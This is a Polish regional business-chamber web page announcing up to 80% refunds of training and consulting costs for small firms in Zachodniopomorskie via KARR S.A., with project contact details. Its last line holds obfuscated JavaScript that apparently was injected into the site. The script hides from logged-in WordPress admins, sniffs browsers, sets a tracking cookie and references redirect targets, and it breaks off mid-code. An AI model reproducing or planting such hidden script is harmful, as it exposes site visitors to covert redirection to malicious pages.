Do 80% refundacji kosztów usług szkoleniowych oraz doradczych! | Północna Izba Gospodarcza w Koszalinie

Uprzejmie informujemy, że
KOSZALIŃSKA AGENCJA ROZWOJU REGIONALNEGO S.A.
jest Operatorem Usług Rozwojowych
dla mikro, małych i średnich przedsiębiorstw oraz stowarzyszeń, fundacji i spółdzielni (prowadzących działalność gospodarczą) z województwa zachodniopomorskiego,
w ramach których mogą oni uzyskać wsparcie

 DO 80% REFUNDACJI KOSZTÓW

USŁUG SZKOLENIOWYCH ORAZ DORADCZYCH
TAKICH JAK NP.: SZKOLENIA, STUDIA PODYPLOMOWE, E-LEARNING, KURSY ZAWODOWE, EGZAMINY, DORADZTWO, MENTORING, COACHING.

Usługi rozwojowe oferowane są w ramach projektu pt.

 „Usługi rozwojowe dla przedsiębiorców i pracowników przedsiębiorstw dostępne w ramach Bazy Usług Rozwojowych”

MŚP mogą korzystać z wybranych przez siebie usług firm szkoleniowych oraz doradczych na terenie całej Polski pod warunkiem, że instytucja szkoleniowa lub doradcza jest zarejestrowana w Bazie Usług Rozwojowych (BUR) pod adresem: www.uslugirozwojowe.parp.gov.pl

Więcej informacji można uzyskać kontaktując się z Biurem Projektu:

 BIURO KOSZALIN

Koszalińska Agencja Rozwoju Regionalnego S.A.
Przemysłowa 8, 75-216 Koszalin
pokój 328, 329

Koordynator Projektu                                                                                             Specjalista ds. Projektów
Beata Górecka                                                                                                         Teresa Janik
tel. 94 34 16 088                                                                                                        tel. 502 077 253
e-mail: b.gorecka@karrsa.pl                                                                                    e-mail: t.janik@karrsa.pl

DORADCY ROZWOJOWI (OKRĘG KOSZALIŃSKI)

Monika Skiba                                                                                                            Łukasz Drążkiewicz
tel. 515 416 845                                                                                                          tel. 515 416 890
e-mail: m.skiba@karrsa.pl                                                                                     e-mail: l.drazkiewicz@karrsa.pl

DORADCY ROZWOJOWI (OKRĘG SZCZECIŃSKI)

 Małgorzata Gajewska                                                                                              Anita Szewczyk
tel. 515 416 856                                                                                                           tel. 515 416 886
e-mail: m.gajewska@karrsa.pl                                                                                 e-mail: a.szewczyk@karrsa.pl

Szczegółowe informacje znajdują się na stroniewww.karrsa.eu/2017/refundacja

  'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m